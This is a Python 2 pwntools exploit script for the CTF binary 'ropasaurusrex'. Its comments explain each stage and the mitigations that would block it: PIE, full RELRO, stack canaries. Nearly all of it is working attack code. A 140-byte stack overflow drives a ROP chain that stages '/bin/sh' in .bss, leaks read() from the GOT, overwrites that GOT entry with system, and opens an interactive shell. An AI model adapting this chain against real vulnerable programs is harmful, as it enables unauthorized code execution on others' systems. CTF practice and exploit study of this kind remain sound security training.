# Stack-overflow ROP exploit for the CTF binary ./ropasaurusrex (32-bit: p32/u32).
# 140 bytes of filler reach the saved return address; from there the chain calls
# the binary's own read@plt / write@plt with a pop-pop-pop-ret gadget (pppr) to
# discard each call's three arguments before the next return.
#
# Defender's view of what each stage relies on (and what would stop it):
#   - every PLT/GOT/.bss address is hard-coded, so the binary must be non-PIE;
#   - stage 3 writes into read's GOT entry, so the GOT must be writable
#     (no full RELRO);
#   - the 140-byte filler is never detected, so there is no stack canary.
# Written for Python 2 / old pwntools: `print` statement, payload is a str.
from pwn import *
from time import *

p = process('./ropasaurusrex')
elf=ELF('./ropasaurusrex')

pppr = 0x80484b6   # pop; pop; pop; ret gadget used to clean 3 args per call
# read - system distance inside libc. NOTE(review): these two constants look
# like addresses from one specific libc build; the chain breaks on any other
# libc, which is why the script leaks the live read() address below.
offset = 0xf7ed5af0 - 0xf7e3ada0 #read - system
bss = 0x8049628            # writable, fixed address used to stage the string
read_got = elf.got['read'] # GOT slot that is leaked in stage 2 and overwritten in stage 3

payload = "A"*140  # filler up to the saved return address

#bss <-"/bin/sh"
# Stage 1: read(0, bss, 8). The 8 bytes are "/bin/sh" plus the newline that
# sendline() appends further down.
payload += p32(elf.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(8)

#print real_read_got
# Stage 2: write(1, read_got, 4) leaks the resolved libc address of read()
# to stdout; the script picks it up with p.recv(4).
payload += p32(elf.plt['write'])
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)

#read_got -> system_addr
# Stage 3: read(0, read_got, 4) overwrites read's GOT entry with the 4 bytes
# sent later (p32(read - offset)). This is the step full RELRO prevents.
payload += p32(elf.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)

#system /bin/sh
# Stage 4: calling read@plt again now dispatches through the overwritten GOT
# entry. "AAAA" fills the return-address slot of that call; bss is its first
# argument.
payload += p32(elf.plt['read'])
payload += "AAAA"
payload += p32(bss)

p.sendline(payload)
p.sendline("/bin/sh")  # consumed by stage 1 (7 bytes + "\n" = 8)
sleep(1)               # presumably lets stages 1-2 run before recv(); timing-dependent
read = u32(p.recv(4))  # leaked address of read() from stage 2
print hex(read)

p.sendline(p32(read - offset))  # consumed by stage 3: new value for read@GOT
p.interactive()